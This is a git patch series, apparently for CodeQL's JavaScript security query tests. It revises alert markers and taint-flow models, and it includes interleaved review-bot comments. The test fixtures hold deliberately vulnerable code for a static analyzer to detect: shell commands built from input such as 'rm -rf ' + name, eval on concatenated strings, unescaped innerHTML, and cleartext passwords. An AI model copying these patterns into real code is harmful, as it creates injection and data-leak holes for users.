@@ -338,7 +338,7 @@ function typicalBadHtmlSanitizers(s) { } function bad18NewRegExp(p) { - return p.replace(new RegExp("\\.\\./"), ""); + return p.replace(new RegExp("\\.\\./"), ""); // $ Alert[js/incomplete-sanitization] Alert[js/incomplete-multi-character-sanitization] -- both lacking global flag, and multi-char replacement problem } function bad4NewRegExpG(s) { From e026b9e04893c06e448d49e86eb33f94aa7abd21 Mon Sep 17 00:00:00 2001 From: Asger F Date: Wed, 12 Feb 2025 10:12:16 +0100 Subject: [PATCH 018/115] JS: Mark regressions due to lack of local field steps --- .../UnsafeShellCommandConstruction/lib/lib.js | 4 ++-- .../CWE-079/UnsafeHtmlConstruction/main.js | 2 +- .../CWE-094/CodeInjection/lib/index.js | 18 +++++++++--------- .../PrototypePollutingAssignment/lib.js | 2 +- 4 files changed, 13 insertions(+), 13 deletions(-) diff --git a/javascript/ql/test/query-tests/Security/CWE-078/UnsafeShellCommandConstruction/lib/lib.js b/javascript/ql/test/query-tests/Security/CWE-078/UnsafeShellCommandConstruction/lib/lib.js index 3a5f05fac77e..b6efdbd131a6 100644 --- a/javascript/ql/test/query-tests/Security/CWE-078/UnsafeShellCommandConstruction/lib/lib.js +++ b/javascript/ql/test/query-tests/Security/CWE-078/UnsafeShellCommandConstruction/lib/lib.js @@ -363,8 +363,8 @@ function MyTrainer(opts) { MyTrainer.prototype = { train: function() { - var command = "learn " + this.learn_args + " " + model; // $ Alert - cp.exec(command); + var command = "learn " + this.learn_args + " " + model; // $ MISSING: Alert - lack of local field step + cp.exec(command); } }; module.exports.MyTrainer = MyTrainer; diff --git a/javascript/ql/test/query-tests/Security/CWE-079/UnsafeHtmlConstruction/main.js b/javascript/ql/test/query-tests/Security/CWE-079/UnsafeHtmlConstruction/main.js index 369643121368..061a82c862d7 100644 --- a/javascript/ql/test/query-tests/Security/CWE-079/UnsafeHtmlConstruction/main.js +++ b/javascript/ql/test/query-tests/Security/CWE-079/UnsafeHtmlConstruction/main.js 
@@ -44,7 +44,7 @@ class Foo { doXss() { // not called here, but still bad. - document.querySelector("#class").innerHTML = "" + this.step + ""; // $ Alert + document.querySelector("#class").innerHTML = "" + this.step + ""; // $ MISSING: Alert - needs localFieldStep } } diff --git a/javascript/ql/test/query-tests/Security/CWE-094/CodeInjection/lib/index.js b/javascript/ql/test/query-tests/Security/CWE-094/CodeInjection/lib/index.js index 950d34ff981f..600059382d9d 100644 --- a/javascript/ql/test/query-tests/Security/CWE-094/CodeInjection/lib/index.js +++ b/javascript/ql/test/query-tests/Security/CWE-094/CodeInjection/lib/index.js @@ -48,7 +48,7 @@ export function Template(text, opts) { Template.prototype = { compile: function () { var opts = this.opts; - eval(" var " + opts.varName + " = something();"); // $ Alert + eval(" var " + opts.varName + " = something();"); // $ MISSING: Alert - due to lack of localFieldStep }, // The below are justs tests that ensure the global-access-path computations terminate. pathsTerminate1: function (node, prev) { @@ -100,10 +100,10 @@ export class AccessPathClass { } doesTaint() { - eval(" var " + this.options1.taintedOption + " = something();"); // $ Alert - eval(" var " + this.options2.taintedOption + " = something();"); // $ Alert - eval(" var " + this.options3.taintedOption + " = something();"); // $ Alert - eval(" var " + this.taint + " = something();"); // $ Alert + eval(" var " + this.options1.taintedOption + " = something();"); // $ MISSING: Alert - due to lack of localFieldStep + eval(" var " + this.options2.taintedOption + " = something();"); // $ MISSING: Alert - due to lack of localFieldStep + eval(" var " + this.options3.taintedOption + " = something();"); // $ MISSING: Alert - due to lack of localFieldStep + eval(" var " + this.taint + " = something();"); // $ MISSING: Alert - due to lack of localFieldStep } } 
@@ -132,10 +132,10 @@ export class AccessPathClassBB { } doesTaint() { - eval(" var " + this.options1.taintedOption + " = something();"); // $ Alert - eval(" var " + this.options2.taintedOption + " = something();"); // $ Alert - eval(" var " + this.options3.taintedOption + " = something();"); // $ Alert - eval(" var " + this.taint + " = something();"); // $ Alert + eval(" var " + this.options1.taintedOption + " = something();"); // $ MISSING: Alert - due to lack of localFieldStep + eval(" var " + this.options2.taintedOption + " = something();"); // $ MISSING: Alert - due to lack of localFieldStep + eval(" var " + this.options3.taintedOption + " = something();"); // $ MISSING: Alert - due to lack of localFieldStep + eval(" var " + this.taint + " = something();"); // $ MISSING: Alert - due to lack of localFieldStep } } \ No newline at end of file diff --git a/javascript/ql/test/query-tests/Security/CWE-915/PrototypePollutingAssignment/lib.js b/javascript/ql/test/query-tests/Security/CWE-915/PrototypePollutingAssignment/lib.js index 6acf7ef2df10..79b34df3f7b5 100644 --- a/javascript/ql/test/query-tests/Security/CWE-915/PrototypePollutingAssignment/lib.js +++ b/javascript/ql/test/query-tests/Security/CWE-915/PrototypePollutingAssignment/lib.js @@ -67,7 +67,7 @@ class Foo { const obj = this.obj; const path = this.path; const value = this.value; - return (obj[path[0]][path[1]] = value); // $ Alert + return (obj[path[0]][path[1]] = value); // $ MISSING: Alert - lacking local field step } safe() { From 2c46e106787f570188d38046431321b1e6f9ff06 Mon Sep 17 00:00:00 2001 From: Asger F Date: Wed, 12 Feb 2025 15:23:37 +0100 Subject: [PATCH 019/115] JS: Mark an alert as missing --- .../test/query-tests/Security/CWE-200/private-file-exposure.js | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) 
diff --git a/javascript/ql/test/query-tests/Security/CWE-200/private-file-exposure.js b/javascript/ql/test/query-tests/Security/CWE-200/private-file-exposure.js index c3aaec3926ff..ba532d6b42e2 100644 --- a/javascript/ql/test/query-tests/Security/CWE-200/private-file-exposure.js +++ b/javascript/ql/test/query-tests/Security/CWE-200/private-file-exposure.js @@ -61,7 +61,7 @@ function good() { app.use("bootstrap", express.static('./node_modules/bootstrap/dist')); } -app.use(express.static(__dirname)) // $ Alert +app.use(express.static(__dirname)) // $ MISSING: Alert const serveHandler = require("serve-handler"); const http = require("http"); From 426a871405c82a1edbf9d51fb5a0b70fb97c2cd7 Mon Sep 17 00:00:00 2001 From: Asger F Date: Tue, 11 Feb 2025 15:11:58 +0100 Subject: [PATCH 020/115] JS: Remove incorrect Alert marker This is expected, based on a comment earlier in the file about the 'y' variable --- .../ql/test/query-tests/Declarations/DeclBeforeUse/jslint.js | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/javascript/ql/test/query-tests/Declarations/DeclBeforeUse/jslint.js b/javascript/ql/test/query-tests/Declarations/DeclBeforeUse/jslint.js index 1e53a3a4a0f0..29eb66403511 100644 --- a/javascript/ql/test/query-tests/Declarations/DeclBeforeUse/jslint.js +++ b/javascript/ql/test/query-tests/Declarations/DeclBeforeUse/jslint.js @@ -3,6 +3,6 @@ /*global: z*/ // also not a proper global declaration w; x; -y; // $ Alert +y; z; // $ Alert var x, y, z; \ No newline at end of file From 287753187eadb95ca9047e4641ab33562f42f699 Mon Sep 17 00:00:00 2001 From: Asger F Date: Tue, 11 Feb 2025 15:24:16 +0100 Subject: [PATCH 021/115] JS: Remove invalid syntax from test TS decorators may not appear on functions and enums --- .../UnusedVariable/UnusedVariable.expected | 2 -- .../Declarations/UnusedVariable/decorated.ts | 12 +++--------- 2 files changed, 3 insertions(+), 11 deletions(-) 
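Review bot: `app.use(express.static(__dirname)) // $ MISSING: Alert` gives no reason for the missing result, while the identical call in subfolder/private-file-exposure-2.js is expected to be found (`// $ Alert[js/exposure-of-private-files]` earlier in this series). Other MISSING markers in the series carry a rationale (`- lack of local field step`, `- the 'markdown-table' model needs to be converted to a flow summary`); recording one here, e.g. `// $ MISSING: Alert - <reason>`, would stop a reader from treating the two files as contradicting each other. If the cause is not yet understood, saying so explicitly is still more useful than a bare marker.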
diff --git a/javascript/ql/test/query-tests/Declarations/UnusedVariable/UnusedVariable.expected b/javascript/ql/test/query-tests/Declarations/UnusedVariable/UnusedVariable.expected index 52ffe782fa2b..6b77c8021fbc 100644 --- a/javascript/ql/test/query-tests/Declarations/UnusedVariable/UnusedVariable.expected +++ b/javascript/ql/test/query-tests/Declarations/UnusedVariable/UnusedVariable.expected @@ -1,7 +1,5 @@ #select | Babelrc/importPragma.jsx:2:1:2:27 | import ... react'; | Unused import q. | -| decorated.ts:1:1:1:126 | import ... where'; | Unused import actionHandler. | -| decorated.ts:4:10:4:12 | fun | Unused function fun. | | eval.js:10:9:10:24 | not_used_by_eval | Unused variable not_used_by_eval. | | eval.js:19:9:19:24 | not_used_by_eval | Unused variable not_used_by_eval. | | externs.js:5:5:5:13 | iAmUnused | Unused variable iAmUnused. | diff --git a/javascript/ql/test/query-tests/Declarations/UnusedVariable/decorated.ts b/javascript/ql/test/query-tests/Declarations/UnusedVariable/decorated.ts index 858f69ffd5b1..39a06d5eb293 100644 --- a/javascript/ql/test/query-tests/Declarations/UnusedVariable/decorated.ts +++ b/javascript/ql/test/query-tests/Declarations/UnusedVariable/decorated.ts @@ -1,13 +1,7 @@ -import {actionHandler, actionHandlerFactory, actionHandlerFactoryProvider, actionHandlerFactoryProviderKind} from 'somewhere'; // OK - imports used as decorators - -@actionHandler -function fun() {} // OK - decorator might use the function +import { actionHandlerFactory, actionHandlerFactoryProvider } from 'somewhere'; // OK - imports used as decorators @actionHandlerFactory -class Class {} // OK - decorator might use the class +class Class { } // OK - decorator might use the class @actionHandlerFactoryProvider -export class ExportedClass {} // OK - decorator might use the class - -@actionHandlerFactoryProviderKind -enum Enum { plain } // OK - decorator might use the enum +export class ExportedClass { } // OK - decorator might use the class 
From a9b263f465d50279805ff6a8d5df7494ea0da543 Mon Sep 17 00:00:00 2001 From: Asger F Date: Tue, 11 Feb 2025 16:01:58 +0100 Subject: [PATCH 022/115] JS: Remove incorrect alert expectation This is not flagged and AFAICT it shouldn't be --- .../Expressions/UnknownDirective/UnknownDirective.js | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/javascript/ql/test/query-tests/Expressions/UnknownDirective/UnknownDirective.js b/javascript/ql/test/query-tests/Expressions/UnknownDirective/UnknownDirective.js index f958714431d6..e86b7b9d95bc 100644 --- a/javascript/ql/test/query-tests/Expressions/UnknownDirective/UnknownDirective.js +++ b/javascript/ql/test/query-tests/Expressions/UnknownDirective/UnknownDirective.js @@ -1,5 +1,5 @@ "use foo"; // $ Alert -"use strict"; // $ Alert +"use strict"; function bad() { "'use strict'"; // $ Alert From 22c218d66586d01b07a03b6934c26d4a9ee3b702 Mon Sep 17 00:00:00 2001 From: Asger F Date: Tue, 11 Feb 2025 16:20:39 +0100 Subject: [PATCH 023/115] JS: Mark a 'good' test as 'bad' and add Alert marker The lack of whitespace around '&&' is problematic --- .../Expressions/WhitespaceContradictsPrecedence/tst.js | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/javascript/ql/test/query-tests/Expressions/WhitespaceContradictsPrecedence/tst.js b/javascript/ql/test/query-tests/Expressions/WhitespaceContradictsPrecedence/tst.js index a18728b19dc0..30b75270f946 100644 --- a/javascript/ql/test/query-tests/Expressions/WhitespaceContradictsPrecedence/tst.js +++ b/javascript/ql/test/query-tests/Expressions/WhitespaceContradictsPrecedence/tst.js @@ -38,8 +38,8 @@ function ok9(x, y, z) { return x * y*z; } -function ok10(o, p) { - return p in o&&o[p]; +function bad10(o, p) { + return p in o&&o[p]; // $ Alert } From b095fe2a19875508583ee2229e6ec72efd07c649 Mon Sep 17 00:00:00 2001 
From: Asger F Date: Wed, 12 Feb 2025 09:51:03 +0100 Subject: [PATCH 024/115] JS: Fix some bugs in a test case 'args' was a redeclared block-level variable, and 'myArgs' was not used when clearly intended to be used --- .../CWE-078/CommandInjection/child_process-test.js | 8 ++++---- 1 file changed, 4 insertions(+), 4 deletions(-) diff --git a/javascript/ql/test/query-tests/Security/CWE-078/CommandInjection/child_process-test.js b/javascript/ql/test/query-tests/Security/CWE-078/CommandInjection/child_process-test.js index d84fc28af7b3..ed1c9041a8ea 100644 --- a/javascript/ql/test/query-tests/Security/CWE-078/CommandInjection/child_process-test.js +++ b/javascript/ql/test/query-tests/Security/CWE-078/CommandInjection/child_process-test.js @@ -43,12 +43,12 @@ var server = http.createServer(function(req, res) { args[1] = cmd; cp.execFile("/bin/bash", args); // $ Alert - let args = []; + args = []; args[0] = "-c"; args[1] = cmd; run("sh", args); - let args = []; + args = []; args[0] = `-` + "c"; args[1] = cmd; cp.execFile(`/bin` + "/bash", args); // $ Alert @@ -56,10 +56,10 @@ var server = http.createServer(function(req, res) { cp.spawn('cmd.exe', ['/C', 'foo'].concat(["bar", cmd])); // $ Alert cp.spawn('cmd.exe', ['/C', 'foo'].concat(cmd)); // $ Alert - let myArgs = []; + let myArgs = []; myArgs.push(`-` + "c"); myArgs.push(cmd); - cp.execFile(`/bin` + "/bash", args); // $ MISSING: Alert - no support for `[].push()` for indirect arguments + cp.execFile(`/bin` + "/bash", myArgs); // $ MISSING: Alert - no support for `[].push()` for indirect arguments }); From c051b4c98d6b3af9ff084a66cc36f9d859ba2212 Mon Sep 17 00:00:00 2001 From: Asger F Date: Wed, 12 Feb 2025 11:53:06 +0100 Subject: [PATCH 025/115] JS: Add spurious alert marker --- .../ql/test/query-tests/Security/CWE-089/untyped/pg-promise.js | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) 
diff --git a/javascript/ql/test/query-tests/Security/CWE-089/untyped/pg-promise.js b/javascript/ql/test/query-tests/Security/CWE-089/untyped/pg-promise.js index 9ed6877e8663..2d82889d7f49 100644 --- a/javascript/ql/test/query-tests/Security/CWE-089/untyped/pg-promise.js +++ b/javascript/ql/test/query-tests/Security/CWE-089/untyped/pg-promise.js @@ -39,7 +39,7 @@ require('express')().get('/foo', (req, res) => { req.params.id, // $ Alert req.params.name, // $ Alert req.params.foo, // OK - not using raw interpolation - ] + ] // $ SPURIOUS: Alert - implicit reads causes flow here in addition to the individual array elements }); db.one({ text: 'SELECT * FROM news where id = ${id}:raw AND name = ${name}', From cf33db78ccdcd8e3d3daf1cb22e75bfbe353c23f Mon Sep 17 00:00:00 2001 From: Asger F Date: Wed, 12 Feb 2025 11:53:34 +0100 Subject: [PATCH 026/115] JS: Fix the spurious flow --- javascript/ql/lib/semmle/javascript/frameworks/SQL.qll | 5 ++++- .../test/query-tests/Security/CWE-089/untyped/pg-promise.js | 2 +- 2 files changed, 5 insertions(+), 2 deletions(-) diff --git a/javascript/ql/lib/semmle/javascript/frameworks/SQL.qll b/javascript/ql/lib/semmle/javascript/frameworks/SQL.qll index 218f2f8366e5..9d106251a211 100644 --- a/javascript/ql/lib/semmle/javascript/frameworks/SQL.qll +++ b/javascript/ql/lib/semmle/javascript/frameworks/SQL.qll 
@@ -221,7 +221,10 @@ private module Postgres { /** Gets a value that is plugged into a raw placeholder variable, making it a sink for SQL injection. */ private DataFlow::Node getARawValue() { - result = this.getValues() and this.getARawParameterName() = "1" // Special case: if the argument is not an array or object, it's just plugged into $1 + result = this.getValues() and + this.getARawParameterName() = "1" and // Special case: if the argument is not an array or object, it's just plugged into $1 + not result instanceof DataFlow::ArrayCreationNode and + not result instanceof DataFlow::ObjectLiteralNode or exists(DataFlow::SourceNode values | values = this.getValues().getALocalSource() | result = values.getAPropertyWrite(this.getARawParameterName()).getRhs() diff --git a/javascript/ql/test/query-tests/Security/CWE-089/untyped/pg-promise.js b/javascript/ql/test/query-tests/Security/CWE-089/untyped/pg-promise.js index 2d82889d7f49..9ed6877e8663 100644 --- a/javascript/ql/test/query-tests/Security/CWE-089/untyped/pg-promise.js +++ b/javascript/ql/test/query-tests/Security/CWE-089/untyped/pg-promise.js @@ -39,7 +39,7 @@ require('express')().get('/foo', (req, res) => { req.params.id, // $ Alert req.params.name, // $ Alert req.params.foo, // OK - not using raw interpolation - ] // $ SPURIOUS: Alert - implicit reads causes flow here in addition to the individual array elements + ] }); db.one({ text: 'SELECT * FROM news where id = ${id}:raw AND name = ${name}', From c593853710dae13f6d7faa8823fc9e2b2bea10fb Mon Sep 17 00:00:00 2001 From: Asger F Date: Wed, 12 Feb 2025 15:00:11 +0100 Subject: [PATCH 027/115] JS: Record some missing alerts in FileAccessToHttp --- .../ql/test/query-tests/Security/CWE-200/googlecompiler.js | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/javascript/ql/test/query-tests/Security/CWE-200/googlecompiler.js b/javascript/ql/test/query-tests/Security/CWE-200/googlecompiler.js index a354777e4921..f7e3a43a087e 100644 
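Review bot: The two new `not result instanceof ...` conjuncts in `getARawValue` test the node returned by `this.getValues()` directly, so they only exclude an array or object literal written inline at the call; if the literal is first bound to a variable (`const values = [...]; db.one(text, values)`) that node is a variable read, not an `ArrayCreationNode`, and the `$1` special case presumably still fires. Since the second disjunct already resolves the argument via `getALocalSource()`, the guard should likely do the same: `not exists(DataFlow::SourceNode src | src = result.getALocalSource() | src instanceof DataFlow::ArrayCreationNode or src instanceof DataFlow::ObjectLiteralNode)`. The `// Special case ...` comment now sits mid-conjunction after the second `and`; placing it on its own line above `result = this.getValues() and` keeps the three conjuncts readable. The body of `getARawValue` continues past the end of the hunk.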
--- a/javascript/ql/test/query-tests/Security/CWE-200/googlecompiler.js +++ b/javascript/ql/test/query-tests/Security/CWE-200/googlecompiler.js @@ -11,7 +11,7 @@ function PostCode(codestring) { 'output_format': 'json', 'output_info': 'compiled_code', 'warning_level' : 'QUIET', - 'js_code' : codestring // $ Alert - passing data from file to the request json body + 'js_code' : codestring // $ MISSING: Alert - passing data from file to the request json body }); // An object of options to indicate where to post to @@ -34,7 +34,7 @@ function PostCode(codestring) { }); }); - post_req.write(post_data); // $ Alert - post the data from file to request body + post_req.write(post_data); // $ MISSING: Alert - post the data from file to request body post_req.end(); } From 319ee2ccd522682fb1441f8115957ce3b08098a2 Mon Sep 17 00:00:00 2001 From: Asger F Date: Wed, 12 Feb 2025 15:20:44 +0100 Subject: [PATCH 028/115] JS: Track deep flow through qs.stringify --- .../javascript/frameworks/UriLibraries.qll | 19 +++++++++++++++++++ .../Security/CWE-200/googlecompiler.js | 4 ++-- 2 files changed, 21 insertions(+), 2 deletions(-) diff --git a/javascript/ql/lib/semmle/javascript/frameworks/UriLibraries.qll b/javascript/ql/lib/semmle/javascript/frameworks/UriLibraries.qll index 0a262d154b2b..90dcc886ed43 100644 --- a/javascript/ql/lib/semmle/javascript/frameworks/UriLibraries.qll +++ b/javascript/ql/lib/semmle/javascript/frameworks/UriLibraries.qll 
@@ -421,3 +421,22 @@ private module ClosureLibraryUri { } } } + +private class QueryStringStringification extends DataFlow::SummarizedCallable { + QueryStringStringification() { this = "query-string stringification" } + + override DataFlow::InvokeNode getACall() { + result = + API::moduleImport(["querystring", "query-string", "querystringify", "qs"]) + .getMember("stringify") + .getACall() or + result = API::moduleImport("url-parse").getMember("qs").getMember("stringify").getACall() or + result = API::moduleImport("parseqs").getMember("encode").getACall() + } + + override predicate propagatesFlow(string input, string output, boolean preservesValue) { + preservesValue = false and + input = ["Argument[0]", "Argument[0].AnyMemberDeep"] and + output = "ReturnValue" + } +} diff --git a/javascript/ql/test/query-tests/Security/CWE-200/googlecompiler.js b/javascript/ql/test/query-tests/Security/CWE-200/googlecompiler.js index f7e3a43a087e..21f88a6d7eed 100644 --- a/javascript/ql/test/query-tests/Security/CWE-200/googlecompiler.js +++ b/javascript/ql/test/query-tests/Security/CWE-200/googlecompiler.js @@ -34,7 +34,7 @@ function PostCode(codestring) { }); }); - post_req.write(post_data); // $ MISSING: Alert - post the data from file to request body + post_req.write(post_data); // $ Alert - post the data from file to request body post_req.end(); } @@ -58,4 +58,4 @@ fs.readFile('LinkedList.js', 'utf-8', function (err, data) { console.log("No data to post"); process.exit(-1); } -}); \ No newline at end of file +}); From e745f42291772beb1920eacd68a3b050284d6d5b Mon Sep 17 00:00:00 2001 From: Asger F Date: Fri, 28 Feb 2025 13:18:41 +0100 Subject: [PATCH 029/115] JS: Remove alert expectation from step This is just a step on the path, not a sink --- .../ql/test/query-tests/Security/CWE-200/googlecompiler.js | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) 
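Review bot: `QueryStringStringification` is added without a QLDoc comment, whereas the library's existing members carry `/** ... */` documentation, so a reader has to work out from `propagatesFlow` that this models taint from any property of the argument object, at any depth, into the returned string. Suggest adding above the class: `/** A taint step through query-string stringification: taint on any property (at any depth) of the first argument reaches the return value. */`. A short comment on `preservesValue = false` noting that this is deliberately a taint step rather than a value-preserving one, because the output is a freshly built string, would also help. Whether `url-parse`'s `qs.stringify` and `parseqs.encode` accept the same nested-object input as the four `querystring`-family modules is not something this hunk shows, so that assumption is worth stating in the doc comment as well.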
diff --git a/javascript/ql/test/query-tests/Security/CWE-200/googlecompiler.js b/javascript/ql/test/query-tests/Security/CWE-200/googlecompiler.js index 21f88a6d7eed..b71ed168533f 100644 --- a/javascript/ql/test/query-tests/Security/CWE-200/googlecompiler.js +++ b/javascript/ql/test/query-tests/Security/CWE-200/googlecompiler.js @@ -11,7 +11,7 @@ function PostCode(codestring) { 'output_format': 'json', 'output_info': 'compiled_code', 'warning_level' : 'QUIET', - 'js_code' : codestring // $ MISSING: Alert - passing data from file to the request json body + 'js_code' : codestring // passing data from file to the request json body }); // An object of options to indicate where to post to From d3de6d18a44f673bbe1af779a11955644ff1a1fa Mon Sep 17 00:00:00 2001 From: Asger F Date: Fri, 28 Feb 2025 13:18:47 +0100 Subject: [PATCH 030/115] JS: Accept other changes to UnusedVariable --- .../Declarations/UnusedVariable/UnusedIndexVariable.js | 2 +- .../ql/test/query-tests/Declarations/UnusedVariable/eval.js | 4 ++-- .../query-tests/Declarations/UnusedVariable/multi-imports.js | 4 ++-- 3 files changed, 5 insertions(+), 5 deletions(-) diff --git a/javascript/ql/test/query-tests/Declarations/UnusedVariable/UnusedIndexVariable.js b/javascript/ql/test/query-tests/Declarations/UnusedVariable/UnusedIndexVariable.js index 7d76d97b96bb..321a1df2f7b3 100644 --- a/javascript/ql/test/query-tests/Declarations/UnusedVariable/UnusedIndexVariable.js +++ b/javascript/ql/test/query-tests/Declarations/UnusedVariable/UnusedIndexVariable.js @@ -1,6 +1,6 @@ function sum(xs, i) { var res = 0; - for(;i++ Date: Tue, 11 Feb 2025 16:38:52 +0100 Subject: [PATCH 031/115] JS: Some more test changes in SpuriousArguments --- .../query-tests/LanguageFeatures/SpuriousArguments/tst.js | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) 
diff --git a/javascript/ql/test/query-tests/LanguageFeatures/SpuriousArguments/tst.js b/javascript/ql/test/query-tests/LanguageFeatures/SpuriousArguments/tst.js index 046ca3aec677..387348232e3d 100644 --- a/javascript/ql/test/query-tests/LanguageFeatures/SpuriousArguments/tst.js +++ b/javascript/ql/test/query-tests/LanguageFeatures/SpuriousArguments/tst.js @@ -40,7 +40,7 @@ new String(1, 2, 3); // $ Alert h(function(x) { return x; }); })(function() {}); -parseFloat("123", 10); +parseFloat("123", 10); // $ Alert - unlike parseInt this does not take a radix (function testWhitelistEmptyFunctions(){ function nonEmpty(){ @@ -115,7 +115,7 @@ parseFloat("123", 10); throwerArrow(42); throwerCustom(42); throwerWithParam(42, 87); // $ Alert - throwerIndirect(42); // OK - but still flagged due to complexity + throwerIndirect(42); // $ SPURIOUS: Alert - flagged due to complexity }); function sum2() { From 576dbcb02053f0fb74238c56f2988a4a10439992 Mon Sep 17 00:00:00 2001 From: Asger F Date: Wed, 12 Feb 2025 10:18:24 +0100 Subject: [PATCH 032/115] JS: Stop overriding entire module.exports object in test Doing `module.exports = blah` prevents other exports from being seen as library inputs. --- .../CWE-078/UnsafeShellCommandConstruction/lib/lib.js | 6 +++--- 1 file changed, 3 insertions(+), 3 deletions(-) diff --git a/javascript/ql/test/query-tests/Security/CWE-078/UnsafeShellCommandConstruction/lib/lib.js b/javascript/ql/test/query-tests/Security/CWE-078/UnsafeShellCommandConstruction/lib/lib.js index b6efdbd131a6..77f49ad77017 100644 --- a/javascript/ql/test/query-tests/Security/CWE-078/UnsafeShellCommandConstruction/lib/lib.js +++ b/javascript/ql/test/query-tests/Security/CWE-078/UnsafeShellCommandConstruction/lib/lib.js @@ -1,6 +1,6 @@ var cp = require("child_process") -module.exports = function (name) { +module.exports.blah = function (name) { cp.exec("rm -rf " + name); // $ Alert cp.execFile(name, [name]); 
@@ -19,7 +19,7 @@ function cla() { } cla.prototype.method = function (name) { cp.exec("rm -rf " + name); // $ Alert } -module.exports = new cla(); +module.exports.cla = new cla(); function cla2() { } @@ -474,7 +474,7 @@ const {promisify} = require('util'); const exec = promisify(require('child_process').exec); -module.exports = function check(config) { +module.exports.check = function check(config) { const cmd = path.join(config.installedPath, 'myBinary -v'); // $ Alert return exec(cmd); } From b54ff3b5b3cdf56249e98e9225f1c81f73f60579 Mon Sep 17 00:00:00 2001 From: Asger F Date: Wed, 12 Feb 2025 15:31:52 +0100 Subject: [PATCH 033/115] JS: Accept an alert --- .../ql/test/query-tests/Security/CWE-312/CleartextStorage2.js | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/javascript/ql/test/query-tests/Security/CWE-312/CleartextStorage2.js b/javascript/ql/test/query-tests/Security/CWE-312/CleartextStorage2.js index 88385a96ab49..ba26d5bc18e3 100644 --- a/javascript/ql/test/query-tests/Security/CWE-312/CleartextStorage2.js +++ b/javascript/ql/test/query-tests/Security/CWE-312/CleartextStorage2.js @@ -4,7 +4,7 @@ var url = require('url'); var server = https.createServer(function(req, res) { let pw = url.parse(req.url, true).query.current_password; res.writeHead(200, { - 'Set-Cookie': 'password=' + pw, + 'Set-Cookie': 'password=' + pw, // $ Alert[js/clear-text-storage-of-sensitive-data] 'Content-Type': 'text/plain' }); }); From e91a046a17a35aa11adbc8760659f53346ffbeae Mon Sep 17 00:00:00 2001 From: Asger F Date: Wed, 12 Feb 2025 15:33:17 +0100 Subject: [PATCH 034/115] JS: Mark a spurious alert --- javascript/ql/test/query-tests/Security/CWE-312/passwords.js | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/javascript/ql/test/query-tests/Security/CWE-312/passwords.js b/javascript/ql/test/query-tests/Security/CWE-312/passwords.js index 686f3d3f4282..af3f1a268a48 100644 --- a/javascript/ql/test/query-tests/Security/CWE-312/passwords.js 
+++ b/javascript/ql/test/query-tests/Security/CWE-312/passwords.js @@ -75,7 +75,7 @@ console.log(config); var temp = { encryptedPassword: req.body.password }; - console.log(temp.encryptedPassword); // OK - XXX + console.log(temp.encryptedPassword); // $ SPURIOUS: Alert[js/clear-text-logging] var secret = password; console.log(`pw: ${secret}`); // $ Alert[js/clear-text-logging] From 51b45598c4682a2158e8a56d96dcf74871ec3a85 Mon Sep 17 00:00:00 2001 From: Asger F Date: Wed, 12 Feb 2025 15:33:35 +0100 Subject: [PATCH 035/115] JS: Move an alert and add query ID --- .../ql/test/query-tests/Security/CWE-312/passwords.js | 8 ++++---- 1 file changed, 4 insertions(+), 4 deletions(-) diff --git a/javascript/ql/test/query-tests/Security/CWE-312/passwords.js b/javascript/ql/test/query-tests/Security/CWE-312/passwords.js index af3f1a268a48..73170197965f 100644 --- a/javascript/ql/test/query-tests/Security/CWE-312/passwords.js +++ b/javascript/ql/test/query-tests/Security/CWE-312/passwords.js @@ -139,19 +139,19 @@ }); function indirectLogCall() { - console.log.apply(this, arguments); + console.log.apply(this, arguments); // $ Alert[js/clear-text-logging] } var Util = require('util'); (function() { var config = { x: password }; - indirectLogCall(config.x); // $ Alert - indirectLogCall(process.env); // $ Alert + indirectLogCall(config.x); + indirectLogCall(process.env); var procdesc = Util.inspect(process.env).replace(/\n/g, '') - indirectLogCall(procdesc); // $ Alert + indirectLogCall(procdesc); console.log(process.env); // $ Alert[js/clear-text-logging] console.log(process.env.PATH); From fc9570234184d86394f66418b31b95f329c27719 Mon Sep 17 00:00:00 2001 
From: Asger F Date: Wed, 12 Feb 2025 15:34:07 +0100 Subject: [PATCH 036/115] JS: Accept some more alerts from CleartextStorage --- .../query-tests/Security/CWE-312/passwords_in_server_1.js | 2 +- .../query-tests/Security/CWE-312/passwords_in_server_2.js | 2 +- .../query-tests/Security/CWE-312/passwords_in_server_3.js | 2 +- .../query-tests/Security/CWE-312/passwords_in_server_4.js | 2 +- .../query-tests/Security/CWE-312/passwords_in_server_5.js | 2 +- .../test/query-tests/Security/CWE-312/tst-webstorage.js | 8 ++++---- 6 files changed, 9 insertions(+), 9 deletions(-) diff --git a/javascript/ql/test/query-tests/Security/CWE-312/passwords_in_server_1.js b/javascript/ql/test/query-tests/Security/CWE-312/passwords_in_server_1.js index 50caa0584aa5..b2cabbc9944f 100644 --- a/javascript/ql/test/query-tests/Security/CWE-312/passwords_in_server_1.js +++ b/javascript/ql/test/query-tests/Security/CWE-312/passwords_in_server_1.js @@ -3,4 +3,4 @@ var app = express(); app.get('/some/path', function() { }) -console.log(password); +console.log(password); // $ Alert[js/clear-text-logging] diff --git a/javascript/ql/test/query-tests/Security/CWE-312/passwords_in_server_2.js b/javascript/ql/test/query-tests/Security/CWE-312/passwords_in_server_2.js index a59e8bba77fa..94fd757c33ce 100644 --- a/javascript/ql/test/query-tests/Security/CWE-312/passwords_in_server_2.js +++ b/javascript/ql/test/query-tests/Security/CWE-312/passwords_in_server_2.js @@ -1,3 +1,3 @@ require("foo"); (function (req, res){}); -console.log(password); +console.log(password); // $ Alert[js/clear-text-logging] diff --git a/javascript/ql/test/query-tests/Security/CWE-312/passwords_in_server_3.js b/javascript/ql/test/query-tests/Security/CWE-312/passwords_in_server_3.js index ea6132502372..118ae5dd2a75 100644 --- a/javascript/ql/test/query-tests/Security/CWE-312/passwords_in_server_3.js +++ b/javascript/ql/test/query-tests/Security/CWE-312/passwords_in_server_3.js 
